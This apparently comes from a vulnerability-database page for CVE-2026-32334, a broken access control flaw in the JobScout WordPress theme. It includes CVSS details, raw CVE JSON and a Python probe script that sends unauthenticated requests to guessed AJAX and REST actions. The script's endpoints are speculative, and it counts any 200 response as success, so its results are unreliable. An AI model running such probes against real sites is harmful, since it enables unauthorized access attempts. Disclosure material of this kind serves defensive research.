Security Vulnerability Report
中文
CVE-2026-32334 CVSS 5.3 MEDIUM

CVE-2026-32334

Published: 2026-03-13 19:54:44
Last Modified: 2026-04-22 21:30:26

Description

Missing Authorization vulnerability in raratheme JobScout jobscout allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects JobScout: from n/a through <= 1.1.7.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

JobScout Theme <= 1.1.7 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-32334 PoC - JobScout Theme Authorization Bypass # This PoC demonstrates accessing protected functionality without authentication import requests import sys def check_vulnerability(base_url): """Check if the JobScout theme is vulnerable to CVE-2026-32334""" # Target endpoints that may be affected by missing authorization # These are common JobScout AJAX endpoints endpoints = [ "/wp-admin/admin-ajax.php", "/wp-json/jobscout/v1/", "/?rest_route=/jobscout/v1/" ] # Common JobScout AJAX actions that may lack authorization actions = [ "jobscout_save_job", "jobscout_update_profile", "jobscout_delete_application", "jobscout_manage_candidates" ] print(f"[*] Testing {base_url} for CVE-2026-32334") print(f"[*] Target: JobScout Theme <= 1.1.7") for endpoint in endpoints: for action in actions: try: if "admin-ajax.php" in endpoint: # Test AJAX endpoint without authentication data = { "action": action, "security": "" # Missing or bypassable security check } response = requests.post(base_url + endpoint, data=data, timeout=10) else: # Test REST API endpoint response = requests.get(base_url + endpoint + action, timeout=10) # Check if request succeeds without authentication if response.status_code in [200, 201]: print(f"[!] Potential vulnerability found at {endpoint} with action {action}") print(f"[!] Status code: {response.status_code}") print(f"[!] Response preview: {response.text[:200]}") return True except requests.RequestException as e: print(f"[-] Error testing {endpoint}: {e}") continue print("[*] No obvious vulnerability indicators found") print("[*] Manual verification recommended") return False if __name__ == "__main__": if len(sys.argv) > 1: target = sys.argv[1] else: target = "http://target-site.com" check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32334", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:43.893", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in raratheme JobScout jobscout allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects JobScout: from n/a through <= 1.1.7."}, {"lang": "es", "value": "Vulnerabilidad por falta de autorización en raratheme JobScout jobscout permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a JobScout: desde n/a hasta &lt;= 1.1.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/jobscout/vulnerability/wordpress-jobscout-theme-1-1-7-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}